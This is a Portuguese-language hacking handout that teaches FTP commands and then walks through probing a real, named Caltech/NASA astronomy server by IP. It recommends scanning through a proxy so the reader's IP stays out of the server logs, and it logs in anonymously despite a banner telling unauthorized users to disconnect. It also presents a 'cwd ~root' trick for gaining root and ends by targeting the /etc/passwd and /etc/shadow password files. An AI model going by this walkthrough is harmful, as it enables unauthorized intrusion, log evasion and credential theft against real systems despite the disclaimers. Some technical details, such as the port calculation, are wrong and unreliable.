Invadindo um servidor FTP

Transcrição

Invadindo um servidor FTP
CONTEUDO
-
O que é FTP
Conceitos básicos
Cliente/Servidor
Porta padrão
Como conectar
Comandos
TraDução de nome de arquivos
Mensagens FTP
-
Servidor alvo
Sobre o servidor que envia dados para NASA
-
Visualizando o servidor FTP com proxy
Webexploiter
Como pegar o IP do servidor
Procurando portas abertas
Visualizando FTP de uma forma segura
-
Visualizando os arquivos do FTP diretamente de seu computador
Como pegar o IP
Verificando se a porta 21 está aberta
Logando no servidor
Definindo um diretório local
Listando diretórios
Abrindo diretórios e listando arquivos
Procurando arquivos ocultos
Baixando arquivos do servidor
Enviando arquivo para o servidor
Visualizando o arquivo do Banner
Analisando os arquivos
Restrições
-
Enviando comandos diretamente para o servidor
Entendendo os comandos
Logando no Sistema
Sistema operacional
Conexão de Dados
Comandos que utilizam conexão de dados
-
FTP via TELNET
Conexão direta com o servidor
-
Conexão de rede via FTP
Como criar uma conexão de rede com o servidor
-
FTP UNIX
Usuários
Navegação
Principais comandos UNIX
Modificando os permissões
Principais diretórios
-
Senhas e Exploits
Login anônimo
Logar como root
Diretório das senhas
Decriptografando uma senha
Quebrando uma senha
Exploits UNIX
BuG DE PHF
Principais Falhas de FTP
PREFÁCIO
Atualmente invadir um servidor de FTP não é mais uma tarefa facio.
Os sistemas operacionais, protocolos evoluíram, muitos bugs foram
corrigidos. Mas ainda esta longe de ser perfeito, existem muitas falhas,
formas de invasão. O que não existe mais são as formulas prontas do tipo
“use este script que você esta dentro do servidor”
Para você conseguir entrar em um servidor FTP, antes de tudo você
precisa saber como ele funciona, quais as vulnerabilidades do servidor e
de seu sistema operacional, conhecer a fundo o protocolo FTP, seus
comandos, ou seja, é preciso realmente estudar.
O propósito desta apostila é este, estudar o funcionamento e
vulnerabilidades de um servidor FTP. Eu usei um servidor Americano que
envia dados para NASA como exemplo, deixei tudo passo a passo como
logar e navegar no servidor, porem quero deixar claro que não tem nada
de ilegal, o servidor tem suas proteções como veremos mais adiante. Não
estou promovendo nenhum tipo de crime virtual, usem isto para aumentar
seu conhecimento em segurança, lembrando que se você mudar um byte
de um servidor que você não tem autorização é crime.
Rackerox
[email protected]
O QUE É FTP
FTP significa File Transfer Protocol (Protocolo de Transferência de Arquivos), e é uma forma
bastante rápida e versátil de transferir arquivos, sendo uma das mais usadas na internet.
Um Website precisa de um servidor FTP para “guardar” seus arquivos. Quando você visita um site
na internet, você esta baixando os arquivos do site (paginas html, fotos, sons, etc) para o seu
computador.
Se você tiver acesso ao servidor FTP de um site, você terá acesso aos arquivos deste site, e mais
se você estiver logado o FTP você poderá mudar os arquivos
Primeiramente vamos entender alguns conceitos.
Para existir uma comunicação entre computadores é necessário:
-Um endereço de cada computador (IP)
-Um linguagem que os dois computadores entendam ( protocolos)
-Como são vários serviços ao mesmo tempo,exemplo chat ,site ,remote, etc...Cada serviço precisa ter uma
porta especifica, caso contrario os dados de um serviço iriam ser recebidos por outros.
Cliente / Servidor
Sem complicar...o conceito é simples:
Cliente é o seu programa de ftp que esta no seu computador.
Servidor é o que está hospedado junto com o site.
(você também pode criar um servidor em seu computador)
O Servidor remoto aceita uma conexão de controle do cliente local. O cliente envia comandos para o servidor
e a conexão persiste ao longo de toda a sessão (tratando-se assim de um protocolo que usa o TCP).O servidor
cria uma conexão de dados para a transferência de dados, sendo criada uma conexão para cada arquivo
transferido. Estes dados são transferidos do servidor para o cliente e vice e versa.
Os comandos estão separados dos dados e o cliente pode enviar comandos durante a transferência de dados. O
encerramento da conexão indica o fim do arquivo.
Porta padrão
A porta padrão para FTP é a porta 21
Como conectar
Existem vários Programas de cliente FTP, mas eles apenas servem para manutenção de sites. O melhor
programa mesmo são os clientes que não usam interface gráfica, eles funcionam com linha de comando,
funcionam no MS-DOS ou no Prompt de Comando no windows.
Vamos fazer um conexão com um servidor FTP usando o programa de FTP que existe no windows XP.Este
programa não tem interface gráfica, ele roda no Prompt de comando.
Para abrir o prompt de comando vá em executar e digite cmd.
Agora vamos abrir o programa de FTP no prompt de comando. Basta digitar ftp e apertar enter. Agora você
esta com o programa aberto, é preciso aprender os comandos.
Comandos FTP
Estes comandos funcionam com você logado no servidor.Você terá controle total sobre os arquivos
hospedados.
COMANDO
SINTAXE
DESCRIÇÃO
! COMANDO
Executa COMANDO na máquina local.
No prompt do ftp, os comandos digitados são, a princípio,
executados na máquina remota. Para executar um comando na
máquina local preceda o mesmo com o !
ascii
Configura o tipo de transferência de arquivos para ASCII. É o valor
padrão
bell
Emite um bip quando um comando é completado
binary
Configura o tipo de transferência de arquivos para binário.
bye
bye
Encerra a sessão ftp e retorna ao interpretador de comandos
cd
cd DIRETÓRIO
Muda o diretório de trabalho para DIRETÓRIO
!
ascii
bell
binary
cdup
Muda para o diretório que está um nível acima do diretótio atual
chmod
chmod MODO ARQUIVO
Altera as permissões de ARQUIVO de acordo com MODO.
close
close
Encerra a sessão ftp e retorna ao interpretador de comandos
delete
delete ARQUIVO
Apaga ARQUIVO
cdup
dir
Lista o conteúdo de DIRETÓRIO colocando o resultado em
ARQUIVO-LOCAL, que é um arquivo na sua máquina. Se
dir DIRETÓRIO ARQUIVO-LOCAL DIRETÓRIO não for especificado, será listado o conteúdo do
diretório atual. Se ARQUIVO-LOCAL não for especificado a
listagem será enviada para a tela.
get
Baixa ARQUIVO-REMOTO para sua máquina com o nome de
get ARQUIVO-REMOTO ARQUIVOARQUIVO-LOCAL. Se ARQUIVO-LOCAL não for especificado o
LOCAL
arquivo será baixado com o mesmo nome que tem na máquina remota.
help
help COMANDO
Descreve sumariamente o COMANDO. Se este não for especificado
será exibida a lista de todos os comandos.
lcd
lcd DIRETÓRIO
Muda o diretório de trabalho na máquina local.
ls DIRETÓRIO ARQUIVO-LOCAL
Lista o conteúdo de DIRETÓRIO colocando o resultado em
ARQUIVO-LOCAL, que é um arquivo na sua máquina. Se
DIRETÓRIO não for especificado, será listado o conteúdo do
diretório atual. Se ARQUIVO-LOCAL não for especificado a
listagem será enviada para a tela.
mdelete ARQUIVOS
Apaga ARQUIVOS
mdir
mdir DIRETÓRIOS ARQUIVOLOCAL
Semelhante a dir, porém lista o conteúdo de vários diretórios
mget
mget ARQUIVOS
Semelhante a get, porém baixa vários arquivos
mkdir DIRETÓRIO
Cria um diretório com o nome de DIRETÓRIO
mls
mls DIRETÓRIOS ARQUIVOLOCAL
Semelhante a ls, porém lista o conteúdo de vários diretórios
mode
mode MODO
Configura o modo de transferência de arquivos para MODO. O modo
padrão é "stream"
modtime ARQUIVO
Exibe a hora da última modificação de ARQUIVO
mput ARQUIVOS
Semelhante a put, porém envia vários arquivos
newer
newer ARQUIVO-REMOTO
ARQUIVO-LOCAL
Substitui o ARQUIVO-LOCAL pelo ARQUIVO-REMOTO se a hora
de modificação do ARQUIVO-REMOTO for mais recente
nlist
nlist DIRETÓRIOS ARQUIVOLOCAL
Semelhante a nls
put
put ARQUIVO-LOCAL ARQUIVOREMOTO
Envia ARQUIVO-LOCAL para o servidor ftp nomeando-o como
ARQUIVO-REMOTO. Se ARQUIVO-REMOTO não for
especificado o arquivo será enviado com o nome de ARQUIVOLOCAL
pwd
pwd
Exibe o caminho completo(PATH) do diretório atual
quit
quit
Semelhante a bye
recv
recv ARQUIVO-REMOTO
Semelhante a get
ls
mdelete
mkdir
modtime
mput
ARQUIVO-LOCAL
reget
remotehelp
rhelp
reget ARQUIVO-REMOTO
ARQUIVO-LOCAL
Semelhante a get com a diferença que se ARQUIVO-LOCAL existe
e é menor que ARQUIVO-REMOTO, reget considera que
ARQUIVO-LOCAL é ARQUIVO-REMOTO parcialmente
transferido e contiua a transferência do arquivo. Muito útil quando se
baixa arquivos grandes.
remotehelp COMANDO
rhelp COMANDO
Semelhante a help, porém solicita ajuda ao servidor ftp
remotestatus remotestatus ARQUIVO
rstatus
rstatus ARQUIVO
Exibe a situação de ARQUIVO. Se ARQUIVO não for especificado,
exibe a situação da máquina remota.
rename
rename NOME-ANTIGO NOMENOVO
Renomeia um arquivo
rmdir
rmdir DIRETÓRIO
Apaga DIRETÓRIO
send
send ARQUIVO-LOCAL ARQUIVOSemelhante a put
REMOTO
size
size ARQUIVO
Exibe o tamanho de ARQUIVO
status
status
Exibe a situação atual do servidor ftp
system
system
Exibe o tipo de sistema operacional da máquina remota
type
type TIPO
Configura o tipo de transferência de arquivos para TIPO. O padrão é
ASCII. Se TIPO não for especificado, será mostrada a configuração
atual
?
? COMANDO
Semelhante a help
Tradução de nomes de arquivos
A sintaxe dos nomes dos arquivos pode ser incompatível entre diferentes Sistemas Operacionais. O UNIX usa
128 caracteres, maiúsculas e minúsculas, enquanto que o DOS usa 8 + 3 caracteres e apenas maiúsculas.
Certos nomes não podem ser usados em alguns sistemas. Devido a isto tudo o BSD ftp define regras para a
tradução de nomes.
Mensagens FTP
O FTP permite dois modos de transferência de mensagens FTP: texto (com traduções apropriadas) ou binário
(sem tradução). Cada mensagem do servidor inclui um identificador decimal de 3 dígitos (exemplo: 226
Transfer complete). Estas mensagens podem ser vistas ou não, usando para isso o modo verbose ou quiet,
respectivamente.
SERVIDOR ALVO
Antes de tudo quero deixar claro que isto não é uma invasão ilegal, o servidor possui suas
proteções, mas adiante vocês vão perceber.
Vamos ver passo a passo como chegar até os arquivos de dentro do servidor.
Site alvo: http://ned.ipac.caltech.edu/
É uma base de dados do Governo Americano coordenada pelo Instituto de
tecnologia da Califórnia que fornece dados físicos e bibliográficos (coordenadas,
parâmetros astronômicos e posição num mapa estelar) para NASA.
É um laboratório de dados extragalácticos.
Visualizando o servidor FTP com Proxy
Agora vamos “exploitar” o site com um Exploiter on line: http://www.webexploiter.com
1º) Pegar o IP do site
Abra o webexploiter e vai em ping, vamos pingar o servidor.
Escolha a opção http delete o “www” e digite apenas:
ned.ipac.caltech.edu
como nesta imagem:
Clique em “ping it”
Pronto agora temos o IP do servidor:
Observe que a resposta do Ping vem com o IP:
134.4.10.118
2º) Procurando Portas abertas no Servidor:
Neste mesmo exploiter vamos fazer um scan de portas no IP que a gente pegou.
Basta ir em PORT SCAN, selecionar todas as portas e colar o IP:
Depois clique em SCAN
Observe que o servidor responde nas portas 80 e 21
A porta 21 por padrão é a porta de FTP
3º) Visualizando o FTP de uma forma Segura:
Agora sabendo que a porta 21 esta aberta, podemos conectar no FTP
Este mesmo exploiter possibilita que você veja arquivos em FTPs que permitem login anônimo:
Basta clicar em FTP > Visualize FTP (login anônimo)
Colar o IP
Clique em START
Observe:
Ai está os diretórios do FTP
Você pode navegar e baixar o que você quiser, têm estudos de galáxias, dados do telescópio hubble.
Como da para perceber é server UNIX. Os arquivos ai rodam no linux mas da para visualizar no windows sem
problema.
Arquivos “.gz” são arquivos compactados o Winzip e o Winrar descompacta no windows.
Arquivos “.dat” é só renomear para “.txt” que você verá os dados.
Apesar do FTP estar permitindo login anônimo a NASA não fez isto para todo mundo ficar mexendo, eles
deixaram um banner dizendo que se você não tem autorização pra entrar no FTP é para desconectar:
“If you are not authorized to access this system, disconnect now.”
Procure na pasta “msgs” que você vai localizar o banner.txt
Vantagem de visializar FTP primeiro no Webexploiter.
É mais prático e você protege seu IP do log do servidor.
Observe que neste servidor da nasa os IPs de quem loga fica registrado, se você deletar algum
arquivo, é crime.
Eu não sei se este é o LOG deles, mas pode ter certeza que o servidor tem um.
Quando você entra com o Webexploiter você conecta via Proxy.
O seu IP passa a ser: 67.15.221.2
Olhe da onde é este IP:
City: Houston
State: TX
Country: US
Postal code: 77060
Area code: 281
Lá no Texas, bem longe da sua casa.
Alem do FTP, o Ping e o Port Scan não partem de seu computador.
Da para você vasculhar o servidor no anonimato.
Mas ele é apenas um Scan, não é um site de invasão, depois de scanear se você quiser invadir pra valer ai é
outra historia.
Visualizando os arquivos do FTP diretamente de
seu computador
Eu não vou colocar senhas do site, existem muitos meios de quebrar uma senha de FTP, vou deixar apenas um
login de UNIX que funciona, mas tem permissão restrita.
A gente já tem todos os dados necessários, mas vou fazer tudo dinovo passo a passo pelo Prompt de
Comando.
1º) Pegar o IP com o Ping
ping ned.ipac.caltech.edu
2º) Verificar se a porta 21 (FTP) está aberta.
Vamos usar o Telnet (no Ruindows XP, o vista não tem)
Digite:
telnet
o 134.4.10.118 21
Você vai verificar que existe conexão e que agora as coisas ficam um pouco mais sérias, olhe a mensagem:
Digite quit duas vazes e saia do telnet
4º) Logando no FTP
Agora sabendo que a porta de FTP esta aberta, vamos entrar no programa de FTP do Ruindows.
Basta digitar FTP e dar enter
-agora vamos logar, digite:
o 134.4.10.118
Note que o servidor manda uma mensagem dizendo que o computador pertence ao Governo Americano, é
operado pelo instituto de tecnologia da califórnia e se você não tem autorização para estar ali é para
desconectar agora.
E depois pede o usuário
Aperte enter, vai dar falha de logon, mas tudo bem
Agora digite:
quote user ftp
Observe, ele aceita este usuário e pede o Password
Agora digite:
quote pass ftp
Olha que bunito xD, você esta dentro do servidor da NASA.
Definindo um diretório local
Primeiramente teremos que definir um diretório local (em nosso computador) para o programa de
FTP baixar e enviar os arquivos.
-Crie uma pasta no seu desktop (eu criei a pasta “rox”)
Agora vamos definir este diretório como diretório local.
Use o comando lcd
Agora digite
lcd Desktop
lcd rox
Pronto agora nossa pasta de trabalho é a pasta “rox”
Listando Diretorios
Primeiro vamos usar o comando dir
Apesar de ser um servidor UNIX o dir vai funcionar porque é um comando de seu programa de FTP
do windows.
Agora temos a lista dos diretórios do servidor.
bin dev etc msgs pub usr
Também podemos usar o comando ls
Abrindo diretórios e listando arquivos
Para abrir um diretório vamos usar o comando cd
Exemplo: vamos abrir o diretório “pub”
O comando será: cd pub
Observe que aparece a lista de todos os arquivos e diretórios que contem no diretório “pub”
Para voltarmos um diretório acima vamos usar o comando c ..
Não é c.. como no DOS, é c .. “C(espaço)..”
Digite c .. e depois ls
Observe que agora voltamos para o diretório anterior.
Procurando arquivos ocultos
O legal de usar comandos ao invés de programas prontos são as opções que você tem de
manipular um arquivo ou diretório, este é um exemplo.
Este servidor é UNIX, em UNIX qualquer arquivo que começa com um “.” (ponto)
É um arquivo oculto. Este arquivo é invisível a primeira vista. E se esta oculto deve ser por algum
motivo.
Vamos analisar o diretório “pub” novamente.
cd pub
ls
Agora digite o comando ls –la
Observe a diferença na lista de arquivos
Baixando arquivos do servidor
Já que estamos no diretório “pub” vamos baixar um arquivo deste diretório.
Primeiro vamos conferir nosso diretório local: comando lcd
Agora vamos usar o comando get para baixar o arquivo.
Importante: não aparecerá nenhuma caixa de download e nenhuma barra de tempo. Dependendo
do tamanho do arquivo, vai demorar para baixar.
Vamos baixar o arquivo lisa.txt
Basta digitar:
get lisa.txt
Espere um pouco e abra a pasta “rox” que você criou no desktop.
Vamos baixar um arquivo oculto, o .dat.gz
get .dat.gz
Você pode baixar todos os arquivos que você conseguir listar.
Se quando você ler esta apostila os arquivos “lisa.txt e “.dat.gz” não mais existirem tente baixar
outros.
Olhe os arquivos que nos baixamos do servidor na pasta “rox”
Enviando arquivo para o servidor
O comando para enviar um arquivo é o comando put
Vamos tentar enviar um arquivo para o diretório pub
Coloque qualquer arquivo no diretório local (no nosso caso a pasta “rox”)
Vou colocar um arquivo qualquer.. .
Lamer_list.doc
É um arquivo do Word
Agora vamos tentar enviar este arquivo para o servidor, basta digitar:
put Lamer_list.doc
Observe:
O servidor não aceitou, isto significa que o nível do seu usuário não permite “UPAR” nada para
aquele diretório. Tente em outro diretório, mas acredito que com logim anônimo você não vai
conseguir. Só com outro login.
Visualizando o arquivo do Banner
Lembra da mensagem do servidor?
Esta aqui:
Vamos traduzir:
*-----------------------------------------------------------------------* Este computador é financiado pelo Governo dos Estados Unidos
* E operado pelo California Institute of Technology
* De apoio ao curso U.S. Government programas e atividades.
* Ao continuar, você concorda com os dados que voce digitar
* Sendo monitorado. Os usuários deste sistema não têm nenhuma expectativa de
* Privacidade.
* Se você não está autorizado a acessar a este sistema, desconecte agora.
*------------------------------------------------------------------------
Vamos achar o arquivo desta mensagem.
É um arquivo de texto.
Volte para o inicio
cd ..
Agora liste
ls
Entre no diretório msgs
cd msgs
liste este diretório
ls
Observe na imagem o arquivo banner.txt
Agora vamos baixar este arquivo
get banner.txt
Agora observe nossa pasta “rox”
Abra o arquivo banner.txt
Surpresa:
Você deve estar pensando:
Então eu vou deletar este arquivo no servidor e colocar outro com minha mensagem no
lugar dele.
Isto é o famoso Banner Grabbing.
O comando para deletar é o del
E o comando para enviar arquivo é o put
Mas as coisas não são tão simples assim, você esta logado como anônimo e sua permissão neste
diretório é este.
drwxr-xr-x
você esta no terceiro grupo “xr-“
Ai não tem nenhum “w” significa que você só pode ler o arquivo e não pode gravar nada.
Com login anônimo sem chance, você terá que pegar alguma senha e logar.
Tem mais arquivos de banner ai, baixe eles e olhe.
Analisando os arquivos
Eu analisei os arquivos do servidor e não achei nada de interessante.
Só tem dados de satélite, telescópio estudos de física.
Se fosse na guerra fria até dava para vender para União Soviética rsrs.
Mas da para estudar e estrutura de diretórios e arquivos UNIX
Olhem as extensões que mais aparecem.
.dat dat é uma abreviação de data (dados), este arquivo contem dados, neste caso dados de
telescópio, satélite,sei la.
Eu renomei um deles para .txt , tinha isto:
File Name: .dat, Processing Time: Thu Feb 8 04:30:00
Output option: compact_2
************************** SEARCH REQUESTS ******************************
IN_CSYS : equatorial , IN_EQUINOX : J2000.0
OUT_CSYS: equatorial , OUT_EQUINOX: J2000.0
EXTENDED_NAME_SEARCH: Yes
SORTED_BY_FIELD : Distance_to_search_center
REDSHIFT_VELOCITY : 10000.0
DEFAULT_RADIUS
: 1.000000
DEFAULT_BEGIN_YEAR : 1900
DEFAULT_END_YEAR : 2006
IAU NAME STYLE
:S
NEARPOSN:
1.4514872000d ; 54.55719600 ; 1.00
Much care has gone into the collection of POSITIONS and VELOCITIES in
NED, and they are carried along with uncertainties and references to
their origin. These are continually over-written by more accurate
values as they become available.
The other "Basic Data", however -- diameters, magnitudes, flux densities,
cluster populations, etc -- are indicative values only, in the sense that
they originate in many different sources, and have not been placed on a
uniform scale. The main sources are catalogs and compilations, with the
more accurate data sets favored, and the larger ones favored at comparable
accuracy. No information is kept about the origin of "Basic Data".
More controlled and rigorous data collection is applied to PHOTOMETRIC
DATA, POSITION DATA, and REDSHIFT DATA. These measurements are carried
along with their uncertainties, references to their origin, and some
information about the data collection and processing behind them. Unlike
basic data, PHOTOMETRIC, POSITION, and REDSHIFT DATA are never erased or
updated, but should serve as a cumulative record of the measurements on
each object. As a future enhancement to NED, additional data frames
along the same lines will be introduced for kinematics, classifications,
and other parameters.
A. Galaxies (G)
Field 1:
Field 2:
Field 3:
Field 4:
Morphology
A magnitude in the visible range, on any scale as available
Major axis diameter in arcmin
Minor axis diameter in arcmin
.gz (arquivo compactado, o winzip do windows consegue descompactar)
.txt (arquivo de texto ...)
.c (são scripts, muito interessante)
Restrições
Quando logamos apareceu a mensagem:
(restrições aplicadas)
E quando digitamos dir apareceu isto.
d x w são códigos de permissão para cada diretório, mas adiante eu explicarei o que significa cada
código.
Isto significa que não temos acesso a tudo dentro do servidor, agora você percebeu que entrar
anônimo, não significa burlar uma senha, mas sim entrar como um usuário com um nível baixo e
cheio de restrições. Mas, uma vês lá dentro, você pode procurar por arquivos e dados que te levam
a senha do root ou à outros usuários.
ENVIANDO COMANDOS DIRETAMENTE PARA O
SERVIDOR
Até agora fizemos um monte de comando, testes e tudo mais. Você deve estar se perguntando:
Mas eu já enviei um monte de comandos?
Sim, você enviou, mas não diretamente, você usou o programa cliente de ftp.
Existe uma diferença em usar um programa de FTP e enviar comandos diretamente para o
servidor. O programa de FTP do windows ou do Linux apenas interpreta estes comandos
padronizados para FTP e envia para o servidor.Enviar um comando diretamente para o servidor é
diferente.
Vamos ver na pratica:
Digite help
Você vai visualizar o help do seu programa de FTP e todos os comandos que o seu programa de
FTP interpreta. No nosso caso nosso servidor é um UNIX e ele interpreta mais comandos do que
apenas estes de nosso programa de FTP.
O programa de FTP do windows tem uma espécie de “filtro” que envia uma linha de comando
diretamente para o servidor, este “filtro” é o comando quote ou o comando literal
Agora digite quote help
Observe que aparece um monte de comandos diferentes que o servidor interpreta, mas estes
comandos não são interpretados pelo seu programa de FTP.
IMAGEM
Existe Duas formas de enviar um comando diretamente para o servidor: usando o comando quote
ou conectando via telnet.
Vamos usar o programa de FTP mesmo
ENTENDENDO OS COMANDOS
O protocolo FTP se baseia em comandos e respostas.
Para enviar um comando basta enviar um texto pela conexão de controle (no nosso caso o nosso
computador) seguido por uma nova linha (“Line Feed” ASCII 10 - 0x0A)
Após o “Line Feed ASCII 10 - 0x0A” o servidor executará o comando e dará uma resposta.
Formato da resposta:
220<ASCII 32 - 0x20>Resposta do Servidor<ASCII 10 - 0x0A>
220 (código de retorno)
ASCII 32 - 0x20 (espaço em branco)
ASCII 10 - 0x0A (uma linha nova)
Se a resposta ocupar mais de uma linha o formato seguira o mesmo padrão.
220-<Espaço>Resposta (Linha 1)<LineFeed>
220-<Espaço>Resposta (Linha 2)<LineFeed>
Neste formato, todas as linhas, com exceção da última, possuem um hífen (ASCII 45 - 0x2D)
imediatamente após o código de retorno, exceto a última, que não possui hífen justamente para
sinalizar que é a última linha da resposta.
Então enquanto não aparecer o hífen deve-se aguardar o termino da resposta
LOGANDO no SISTEMA
Os comandos são simples user (para usuário) e (pass para senha)
Depois de conectado com o programa de ftp do windows ou do linux vamos enviar comandos
diretamente para o servidor utilizando o comando quote
quote user seuusuario
quote pass suasenha
Se você não souber nenhuma senha tente anônimo
quote user anonymous
quote pass [email protected]....
Você também pode tentar explorar uma falha antiga, mas só funciona com servidores
antigos.quando aparecer para logar digite isto:
quote user ftp
depois
quote cwd ~root ou quote cwd~sys quote cwd~sysop
depois
quote pass ftp
O comando cwd (Change Working Directory) é usado orinalmente para abrir um diretório, neste
caso ele iria abrir ~root ,se isto acontecer Voce estará com privilégios root, você pode fazer o que
quiser no servidor, terá permissão para tudo, inclusive para ser preso =)
SISTEMA OPERACIONAL
Agora que já estamos logados vamos descobrir qual o sistema operacional do servidor, vamos usar
o comando syst , como é um comando direto vamos usar quote syst
Agora sabemos que é UNIX
CONEXÃO DE DADOS
Existem comandos que precisam de uma conexão de dados estabelecida, por exemplo, se for
baixar algum arquivo do servidor é necessário estabelecer portas do computador para isto.
O programa de FTP faz tudo isto automaticamente, mas como estando enviando um comando
direto ao servidor teremos que estabelecer quais serão as portas que iremos usar.
Vamos usar o comando port
O “port” indica ao servidor quais portas serão usadas na conexão
Neste comando, deve-se passar 6 valores separados pro vírgula. Os 4 primeiros são os dígitos do IP.
Os outros dois valores representam a porta TCP em que será feita a conexão.para definir a porta é um pouquinho
complicado, você terá que separar os dois bytes que compõem o valor da porta e convertê-los para decimal.Exemplo:
Xxxxx
Exemplo do comando port
Você também pode deixar o servidor especificar qual porta será utilizada, eu acho bem melhor, ai
você não corre o risco de especificar uma porta que já esta sendo utilizada.Para isto use o
comando pasv
Os bytes retornados nos parênteses são: os quatros primeiros são o IP, os outros dois são a porta.
Para obter o número da porta, pegue o primeiro valor, multiplique por 256 e some ao segundo.
Neste caso (164,217) a porta seria 24201 (10x164 + 217 = 24201).
PRINCIPAIS COMANDOS que utilizam Conexão de Dados
quote list (lista os arquivos do diretório atual no servidor)
quote stor (Envia um arquivo para o servidor)
quote retr (Faz o download de um arquivo do servidor)
HELP
Cuidado para não se confundir com o help, este comando lista todos os comandos do servidor,
mas se você digita apenas help você terá os comandos do seu programa de FTP, para ver os
comandos do servidor digite quote help
Comando help (help do programa de FTP)
Comando quote help (help do servidor)
FTP via TELNET
Também podemos conectar um cliente Telnet na porta do FTP.
Primeiro vamos abrir nosso cliente Telnet, abra o prompt de comando novamente e digite telnet
(isto no windows XP, no vista você terá que baixar um cliente)
Depois que você apertar enter abrira o cliente de telnet do Windows.
Agora vamos abrir uma conexão com o servidor.
Vamos usar o comando open :
open ipdoservidor portadeconexao
Exemplo: vamos abrir uma conexão com o IP 134.4.10.118 na porta 21
Lembrando que a porta padrão para FTP é a porta 21.
O comando fica assim:
open 134.4.10.118 21
depois de conectado vamos logar no servidor, usando comando user
Se voce souber algum user e senha logue com ele, se não tente logar anônino
User anonymous
Se o servidor aceitar ele vai pedir para você completar com o passwd ou seu email, agora você usa
o comando pass
Mas no servidor não existe passwd para anonymous então você pode inventar um endereço de
email usando o domínio do servidor.
Resumindo:
user anonymous
pass [email protected]
Depois só voce apertar enter que você estará logado, observe a imagem.
Agora digite help
Vai aparecer uma lista de comandos. Esta lista de comandos não é do seu cliente de telnet, mas
sim do servidor que você esta acessando.
Observe que tem a assinatura do root: [email protected]
Via telnet você terá uma conexão direta com o servidor, isto significa que você não precisa mais do
quote, e também que aqueles comandos do programa de FTP não funcionará aqui.
Aqui só vão funcionar os comandos do servidor.
Para encerrar a conexão, basta digitar quit
Conexão de rede via FTP
Podemos visualizar e manipular arquivos de um servidor FTP dentro do windows como se o
arquivo estivesse no nosso computador.
Observe a imagem, aparece as pastas no explorer, você pode copiar, colar, recortar...
Para criar a conexão:
-
Clique em Iniciar > Configurações > Painel de Controle > Conexões de Rede.
Em outros locais (coluna à esquerda) entre em Meus Locais de Rede
Depois clique em Adicionar local de Rede
Agora é só ir seguindo as etapas.
Coloque o IP ou o endereço do servidor de FTP
A vantagem de usar FTP desta forma é que fica bem mais simples e intuitivo.
Mas a grande Desvantagem é que você não terá as varias opções de comandos que existe no
prompt, você está limitado a copiar colar. Por exemplo, se tiver algum arquivo oculto, você nem
saberá.
FTP UNIX
A grande maioria dos servidores de FTP usam o Sistema Operacional UNIX.
Vamos ver como funciona e os principais comandos de UNIX em um servidor FTP
USUÁRIOS
Root = super usuário ( poder realizar todas as funções sem restrição )
Cada usuário é classificado com um número, de 0 a FFFF-1 (65534).
O numero 0 é designado para o Root e o 65534 para Ananymous
De 0 a 100 são de superusuários (bin, adm, user, admin, guest, etc), se o servidor for pequeno o
root e estes outros superusários são a mesma pessoa.
NAVEGAÇÃO
Importante em Unix os comandos são Case Sensitive ( diferencia letras maiúsculas e minúsculas
ao contrario do MS-DOS)
O Unix usa arvore de diretórios igual ao DOS mas a barra é invertida, ( utilize / ao invés de \ )
ls (mostras os diretórios e arquivos, o ls equivale ao DIR /W)
ls –a (mostras arquivos ocultos)
ls –la (mostras arquivos ocultos com detalhes)
ls –l (mostra as permissões)
exemplo:
drw-r--r--
root
root
10000
1 de abril
etc
d - directory
r - read - so pode ver, dar download, etc...
w - write - pode editar, gravar...
x - execute - eh um executavel ou um script (tipo .BAT do DOS)
Primeiro espaço: mostra se é um diretório ou não.
Próximos 3 espaços: o que o proprietário pode fazer com o arquivo
Próximos 3 espaços: são do GROUP que pertence o arquivo
Últimos 3 espaços: são do USER (o que qualquer usuário pode fazer)
Os últimos números são bytes ocupados.
PRINCIPAIS COMANDOS
cd nomedodiretorio (para mudar de diretório)
cd .. (para voltar um diretório)
pwd (para ver em que diretório você esta)
mkdir nomedodiretorio (para criar um diretório)
rm arquivo (remover um arquivo, irá pedir confirmação y ou n )
cp arquivooriginal novalocalizaçao (copiar um arquivo)
cat (mostra o conteúdo de um arquivo equivale ao type do DOS)
who ( mostra quem está conectado no server, para mandar uma mensagem utilize write
nomedouser)
get nomedoarquivo (faz download do arquivo)
cc arquivo (compila um arquivo)
gcc arquivo monedoprograma ( compila um arquivo como o cc)
MODIFICANDO AS PERMISSÕES
chmod muda as permissões, exemplo:
ls -l teste.txt
-rw-r--r-- LoKi LoKi 34 teste.txt
chmod g+w teste.txt ---> muda o acesso do Group para +write
ls -l teste.txt
-rw-rw-r-- LoKi LoKi 34 teste.txt
chmod a-r teste.txt ---> muda o acesso de All para -read
ls -l teste.txt
--w--w---- LoKi LoKi 34 teste.txt
chmod u+w teste.txt ---> muda o acesso de User para +write
ls -l teste.txt
--w--w--w- LoKi LoKi 34 teste.txt
resumindo:
o - para Owner
g - para o Grupo
u - para todos Usuários
Importante: somente o root ou o proprietário pode usar o chmod.
Mais comandos
chown, muda o OWNER (proprietário) de algum arquivo, isso se você for o OWNER atual.
Use chown novodono nomedoarquivo
chgrp, muda o grupo a que pertence o arquivo.
Use chgrp novogrupo nomedoarquivo
PRICIPAIS DIRETORIOS
/etc/passwd
Neste diretório estão contidos:
Usuários, Senhas , Ids
Abra o arquivo passwd, dependendo da sua permissão aparecera:
root:*:0:1:system PRIVILEGED account:/:/bin/sh
anonymous:*Nologin:65534:65534:anonymous NFS user:/:
ou
zezinhodaesquina:HS$672H:457:457:Senhor Joao:/usr/joazinho:/bin/sh
(username:Password:id:uid:mini descrição:diretório de trabalho:'command.com')
Se você conseguir abrir o arquivo passwd você verá que o anonymous não tem senha (por isso
você pode logar anônimo com qualquer password)
Se você perceber algum outro user UNPASSWORDED (sem senha) e com o ID melhor que o seu,
entre logado com ele.
Mas se a senha esta ai, porque não entrar com ela agora?
Respostas, as senhas estão criptografadas, mas adiante veremos como decriptografar.
Talves quando você abra o arquivo passwd pode aparecer isto:
root:*:0:1:system PRIVILEGED account:/:/bin/sh
anonymous:*Nologin:65534:65534:anonymous NFS user:/:
nobodyV:*Nologin:60001:60001:anonymous SystemV.4 NFS user:/:
daemon:*:1:1:system background account:/:
bin:*:3:4:system librarian account:/bin:
uucp:Nologin:4:2:UNIX-to-UNIX Copy:/usr/spool/uucppublic:/usr/lib/uucp/uucico
ris:Nologin:11:21:Remote Installation Services Account:/usr/adm/ris:/bin/sh
ftp::12:15:Anonymous FTP:/tmp:/bin/sh
Observe que no lugar das senhas dos usuários aparece um asterisco “*” , isto significa que as
senhas estão em um outro lugar. Normalmente em
/etc/shadow, e as vezes ela esta -r (No read) para os Users normais.
Agora é hora de trabalhar, se as senhas estão (no read) teremos que achar uma forma de vê-las.
